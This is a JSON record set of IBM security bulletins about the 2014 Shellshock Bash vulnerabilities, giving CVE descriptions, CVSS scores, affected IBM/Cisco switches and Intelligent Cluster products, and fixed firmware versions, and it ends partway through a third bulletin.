{"lastseen": "2022-04-12T23:42:59", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM/Cisco switches and directors.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96153_](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96209_](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**The Following are IBM/Cisco Switches and Directors:** \n \n**IBM MTM:** \n \n**9710-E01 **MDS 9250i Multilayer Fabric Switch \n**9710-E08 **MDS 9710 Director \n**2054-E01 **MDS 9222i Multilayer Fabric Switch \n**2054-E04 **(2062-D04) MDS 9506 Multilayer Director \n**2054-E11 (**2062-E11) MDS 9513 Multilayer Director \n**2054-E07 **(2062-D07) MDS 9509 Multilayer Director \n**2053-424 **(2417-C24) MDS 9124 Fabric Switch \n**2053-434 **(2053-S34) MDS 9134 Fabric Switch \n**2417-C48 **MDS 9148 Fabric Switch \n**3722-S51 **5010 Switch \n**3722-S52 **5020 Switch\n\n## Remediation/Fixes\n\nIBM recommends that you remediate the Bash vulnerability by updating to the following code release. 
\n \n**NX-OS Release 6.2(9a)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/6_2/release/notes/nx-os/mds_nxos_rn_629a.html> \n \n \n \n**NX-OS Release 5.2(8e)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/5_2/release/notes/nx-os/mds_nxos_rn_528e.html> \n \n \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n## Workarounds and Mitigations\n\n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. 
IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Change History\n\n16 October 2014: Original Version Published \n03 November 2014 CVE info for 7186 and 7187 \n03 November 2014 Added Link to fix in the 5.2(8e) code level\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSU6LN\",\"label\":\"Cisco MDS 9710 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"Enterprise\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"ST6VQW\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9124 Fabric Switch\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of 
Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSY5QTU\",\"label\":\"Cisco MDS 9250i Multiservice Fabric Switch\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSBDGXE\",\"label\":\"Cisco MDS 9506 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"ST7SML\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9509 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STTQ3Y\",\"label\":\"Cisco MDS 9513 Multiplayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:07:09", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM/Cisco Switches and Directors (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T15:07:09", "id": "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "href": "https://www.ibm.com/support/pages/node/690071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T23:29:50", "description": "## Summary\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Vulnerability Details\n\n## Abstract\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Content\n\n**Vulnerability Details:**\n\nPlease consult the security bulletins below for vulnerability details and information about fixes:\n\n * [ Intel Xeon Phi PCIe adapters](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503>)\n * Mellanox SX6536, SX6036, and SX1036\n * [ IBM Flex System FC3171 8Gb SAN 
Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096678>)\n * [ IBM Flex System EN6131 40Gb Ethernet Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [ IBM Flex System IB6131 Infiniband Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [Storwize V3700](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897>)\n * [ IBM Flex System FC5022 16Gb SAN Switch](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm_flex_system_fc5022_16gb_san_scalable_switch_fc5022_24_port_16gb_esb_san_scalable_switch_fc5022_24_port_16gb_san_scalable_switch_and_two_16gb_fc_sfps_firmware_is_affected_by_the_following_openssl_vulnerabilities?lang=en_us>)\n * [ DDN SFA12000 and SFA7700](<http://www.ddn.com/download/tech-support-bulletins/hot-bulletins/SFA%20OS%20Mandatory%20Upgrades%20Fix%20Shellshock%20BASH%20Bug.pdf?89d02a>)\n * Intel True Scale 12000 Series Switches\n * [ IBM SAN24B Series Switches](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CCwQFjAC&url=http%3A%2F%2Fwww.brocade.com%2Fdownloads%2Fdocuments%2Ftechnical_support_bulletins%2Fbrocade-assessment-bashabug-vulnerability.pdf&ei=BIDbVLjgLs31oASn44DAAg&usg=AFQjCNHJH46mCrLvDsXKFyxZIVqW_YJ46Q&bvm=bv.85761416,d.aWw&cad=rja>)\n\nNote: Not all supported products have a corresponding security bulletin.\n\n## Affected products and versions\n\nAffected Supporting Product | Fix Version | Intelligent Cluster Best Recipe \n---|---|--- \nIntel Xeon Phi PCIe | 3.3.2 | 14B (01/2015) \nMellanox SX6536, SX6036, and SX1036 | 3.4.0012 | 14B (01/2015) \nIBM Flex System FC3171 | 9.1.3.05.00c | 14B (01/2015) \nIBM Flex System EN6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System IB6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System FC5022 | 7.2.1c1 | 14B (01/2015) \nIntel True Scale 12000 Series Switches | 7.3.0.0.15 | 14B (01/2015) \nDDN SFA12000 and SFA7700 | 2.2.1.3-21587 | 14B (01/2015) 
\nStorwize V3700 | 7.3.0.8 | 14B (01/2015) \nIBM SAN 24B Series Switches | 7.2.1d | 14B (01/2015) \n \n## Remediation/Fixes:\n\nSee Fix Versions in the table above.\n\nThe Intelligent Cluster Best Recipe 14B in Fix Central includes Mellanox OFED for IBM. See also [ http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters](<http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters>).\n\n## Workaround(s) & Mitigation(s):\n\nNone\n\nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement**\n\nNone\n\n**Change History** \n11 February 2015: Added DDN, FC5022, Intel True Scale, SAN 24B, and updated Mellanox \n12 January 2015: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOn \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n## Operating System\n\nSystem x Integrated Solutions:Operating system independent / None\n\n[{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HWC20\",\"label\":\"System x Integrated Solutions->Intelligent Cluster\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {}, "published": "2019-01-31T01:45:01", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect multiple products shipped with Intelligent Cluster (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-01-31T01:45:01", "id": "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "href": "https://www.ibm.com/support/pages/node/866188", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-13T23:42:27", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by TSSC..\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xfo